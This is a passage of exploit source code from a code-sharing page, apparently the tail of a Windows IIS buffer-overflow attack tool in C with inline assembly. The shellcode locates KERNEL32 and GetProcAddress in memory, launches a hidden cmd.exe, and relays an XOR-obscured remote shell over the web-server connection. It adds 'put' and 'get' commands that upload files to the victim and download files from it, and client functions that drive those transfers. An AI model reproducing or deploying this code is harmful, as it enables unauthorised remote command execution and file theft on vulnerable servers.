📄 windows下强大功能的溢出程序源代码.txt
字号:
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle,fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
SECURITY_ATTRIBUTES sa;
_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
// 注意这儿处理了搜索页面不在情况。
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto die ;
for(k=1;k<SHELLFNNUMS;++k){
apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
stradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
while(1){
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k<lBytesRead;++k){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
}
}
else{
lBytesRead=SHELLBUFFSIZE;
l=0;
while(l==0){
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l<lBytesRead;++l){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar;
}
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
l=*(int *)(Buff+4);
// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0)
;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k<lBytesRead;++k){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar;
}
l-=lBytesRead;
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
}
}
else{
Sleepadd(0100);
++i;
}
if(i>10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis'; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i<lBytesRead;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
// Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i<k;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
// Sleepadd(100);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff); //僵死
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i<len;++i){
temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
// Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
// Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar;
}
}
return(k);
}
int newsend(int fd,char *buff,int size,int flag)
{
int i;
for(i=0;i<size;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar;
}
return(send(fd,buff,size,flag));
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -